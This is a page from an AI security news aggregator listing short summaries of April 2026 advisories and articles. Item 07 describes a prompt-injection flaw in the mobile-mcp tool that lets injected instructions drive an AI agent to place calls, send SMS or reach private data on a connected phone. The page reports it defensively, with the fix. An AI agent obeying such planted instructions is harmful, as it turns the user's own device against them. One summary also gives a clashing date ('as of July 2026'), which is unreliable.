aisecwatch.com
DashboardVulnerabilitiesNewsResearchArchiveStatsDatasetFor devs
Subscribe
aisecwatch.com

Real-time AI security monitoring. Tracking AI-related vulnerabilities, safety and security incidents, privacy risks, research developments, and policy changes.

Navigation

VulnerabilitiesNewsResearchDigest ArchiveNewsletter ArchiveSubscribeData SourcesStatisticsDatasetAPIIntegrationsWidgetRSS Feed

Maintained by

Truong (Jack) Luu

Information Systems Researcher

AI Sec Watch

The security intelligence platform for AI teams

AI security threats move fast and get buried under hype and noise. Built by an Information Systems Security researcher to help security teams and developers stay ahead of vulnerabilities, privacy incidents, safety research, and policy developments.

Independent research. No sponsors, no paywalls, no conflicts of interest.

[TOTAL_TRACKED]
3,710
[LAST_24H]
1
[LAST_7D]
1
Daily BriefingSaturday, May 16, 2026

No new AI/LLM security issues were identified today.

Latest Intel

page 86/371
VIEW ALL
01

research-llm-apis 2026-04-04

research
Apr 4, 2026

A developer is redesigning the abstraction layer (a simplified interface that handles communication with many different AI services) of their LLM Python library to support new vendor features like server-side tool execution (where the AI provider runs code on their servers rather than the user's computer). They used Claude Code to analyze Python client libraries from major AI vendors and generate test commands to understand how these services handle both streaming (real-time data flow) and non-streaming data across different scenarios.

Simon Willison's Weblog
02

A Survey on Recent Advances in Conversational Data Generation

research
Apr 4, 2026

This is a survey paper published in an academic journal that reviews recent progress in conversational data generation, which refers to techniques for creating dialogue datasets (collections of conversations) used to train and improve AI systems. The paper appears to be a comprehensive overview of advances in this field as of July 2026, but no specific technical findings, vulnerabilities, or security issues are described in the provided content.

ACM Digital Library (TOPS, DTRAP, CSUR)
03

Really, you made this without AI? Prove it

policyindustry
Apr 4, 2026

As generative AI (machine learning systems that create text, images, and other content) becomes better at mimicking human work, people increasingly doubt whether online content is human-made, yet platforms often don't label AI-generated material. The author suggests creating a universal labeling system (similar to Fair Trade certification) that marks human-created content instead, since AI systems have no incentive to identify their own work but human creators do to protect themselves from being replaced.

The Verge (AI)
04

Hackers Are Posting the Claude Code Leak With Bonus Malware

security
Apr 4, 2026

Anthropic's source code for Claude Code (an AI coding tool) was accidentally made public, and hackers have been reposting it on GitHub with infostealer malware (software that steals personal information) embedded in the code. Anthropic has been trying to remove the leaked copies by issuing copyright takedown notices, initially targeting over 8,000 repositories before narrowing efforts to 96 copies.

Fix: Anthropic has been issuing copyright takedown notices to remove copies of the leaked code from GitHub.

Wired (Security)
05

GHSA-mvv8-v4jj-g47j: Directus: Sensitive fields exposed in revision history

securityprivacy
Apr 4, 2026

Directus, a content management system, failed to properly sanitize sensitive data (like user tokens, two-factor authentication secrets, and API keys) before storing them in revision history records. This meant that anyone with access to the revision database table could read these secrets in plaintext, potentially allowing account takeover or unauthorized access to third-party services.

GitHub Advisory Database
06

GHSA-qqmv-5p3g-px89: Directus: TUS Upload Authorization Bypass Allows Arbitrary File Overwrite

security
Apr 4, 2026

Directus has a security flaw in its TUS resumable upload endpoint (a feature that lets users upload files in chunks) that lets any authenticated user overwrite any file in the system by specifying its UUID (unique identifier), bypassing row-level permissions (rules like 'users can only edit their own files'). This can lead to permanent data loss and allow low-privilege users to replace important files with malicious content.

Fix: Disable TUS uploads by setting `TUS_ENABLED=false` if resumable uploads are not required.

GitHub Advisory Database
07

GHSA-5qhv-x9j4-c3vm: @mobilenext/mobile-mcp: Arbitrary Android Intent Execution via mobile_open_url

securitysafety
Apr 4, 2026

The mobile_open_url tool in mobile-mcp doesn't check what type of URL scheme (the protocol prefix like http:// or tel://) it receives before sending it to Android, allowing attackers to use prompt injection (tricking an AI by hiding instructions in its input) to execute dangerous commands like making phone calls, sending SMS messages, or accessing private data on a connected mobile device.

Fix: Upgrade to version 0.0.50 or later, which restricts mobile_open_url to http:// and https:// schemes by default. Users who require other URL schemes can opt in by setting the environment variable MOBILEMCP_ALLOW_UNSAFE_URLS=1.

GitHub Advisory Database
08

Anthropic essentially bans OpenClaw from Claude by making subscribers pay extra

industry
Apr 3, 2026

Anthropic is changing its policy so Claude users can no longer use their subscription to access OpenClaw (a third-party tool that integrates with Claude), forcing them to pay separately instead. The change takes effect April 4th, and may be motivated by Anthropic wanting to promote its own competing tools like Claude Cowork.

The Verge (AI)
09

GHSA-v959-cwq9-7hr6: BentoML: SSTI via Unsandboxed Jinja2 in Dockerfile Generation

security
Apr 3, 2026

BentoML's Dockerfile generation uses an unsandboxed Jinja2 template engine (a tool that processes template files with dynamic code) with dangerous extensions enabled, allowing attackers to embed malicious code in a template file. When a victim imports a malicious bento archive and runs the containerize command, the attacker's code executes directly on the victim's host machine before any container isolation happens, rather than inside a container where it would be restricted.

GitHub Advisory Database
10

GHSA-fgv4-6jr3-jgfw: BentoML: Command Injection in cloud deployment setup script

security
Apr 3, 2026

BentoML has a command injection vulnerability in its cloud deployment setup script where user-supplied system packages are inserted directly into shell commands without proper escaping. An attacker can craft a malicious bentofile.yaml file that executes arbitrary commands on BentoCloud's build infrastructure (the servers that prepare applications for deployment) when the application is deployed, potentially stealing secrets or compromising the infrastructure.

GitHub Advisory Database
Prev1...8485868788...371Next